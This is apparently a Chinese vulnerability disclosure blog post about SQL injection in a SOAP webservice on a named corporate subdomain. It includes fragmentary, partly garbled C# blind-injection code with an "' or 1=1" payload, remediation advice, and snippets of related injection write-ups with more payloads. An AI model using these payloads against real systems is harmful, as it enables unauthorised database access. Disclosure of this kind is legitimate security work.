萬達某分站SQL注入漏洞一枚

2021-12-29 21:39:41 字數 998 閱讀 4830

存在漏洞站點:mtodo.wanda.cn 不知道這站是幹啥的,先不管~~

漏洞檔案:

直接提交帶注入的引數,就會302:

既然有webservice,那就用**走soap協議來嘗試,於是操起vs亂寫了一通~~

當前使用者:

本屌寫的亂的一公尺的**:

cn.wanda.mtodo.servicemobile sm = new cn.wanda.mtodo.servicemobile();

private void btngetallcount_click(object sender, eventargs e)

if ((sm.getallcount("' or 1=1 and " + j + "=len(" + leix + ")--")).contains("1700"))

}this.txtmsg.text = this.txtuserid.text + " len: " + str_len + "\r\n";

this.txtmsg.text += leix + " : ";

if (str_len > 0)

;for (int k = 1; k <= str_len; k++));}

}else}}

}}catch(exception eq)} 

1.引數化查詢,別拼sql語句了

2.webservice最好部署在內網裡呼叫~ 公網就別啟用了

愛康國賓(員工體檢)某重要分站SQL注入多庫和越權

嗯,這個點也是,我開始還以為是mysql 漏洞系統 mec.ikang.com 隨便在搜尋引擎搜尋一下,發現收錄了很多類似以下的連線 這裡可以看到 登陸的username就是kefupeixun 這個位址是不需要授權訪問的 b 但是,訪問這個位址之後,再訪問其他功能頁,就不需要登陸了,就是當前登陸的...

一 程式安全 SQL注入漏洞

先新建mydb.mdf,表myuser 測試頁面 一 利用報錯獲取資訊 操作 按姓名精確查詢,在輸入框輸入 小衛 and 1 db name 0 and 1 1 執行語句 select from myuser where uname 小衛 and 1 db name 0 and 1 1 結果 得到資...

KPPW最新版SQL注入漏洞一

kppw最新版sql注入一 kppw最新版sql注入一 檔案 control gy buyer order.php switch step if isset action else break default kekezu show msg 訪問頁面不存在 index.php 3,null,warn...